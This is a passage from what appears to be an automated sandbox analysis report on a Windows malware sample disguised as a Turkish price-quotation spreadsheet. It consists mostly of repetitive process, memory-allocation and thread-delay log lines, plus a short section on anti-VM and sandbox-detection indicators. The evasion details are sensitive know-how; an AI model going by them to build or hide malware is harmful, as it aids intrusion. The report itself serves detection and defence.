                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 51D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory allocated: 1650000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory allocated: AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B60000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2DA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B13134 rdtsc 0_2_05B13134
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598652Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598435Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598326Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598107Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595896Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595771Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595358Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
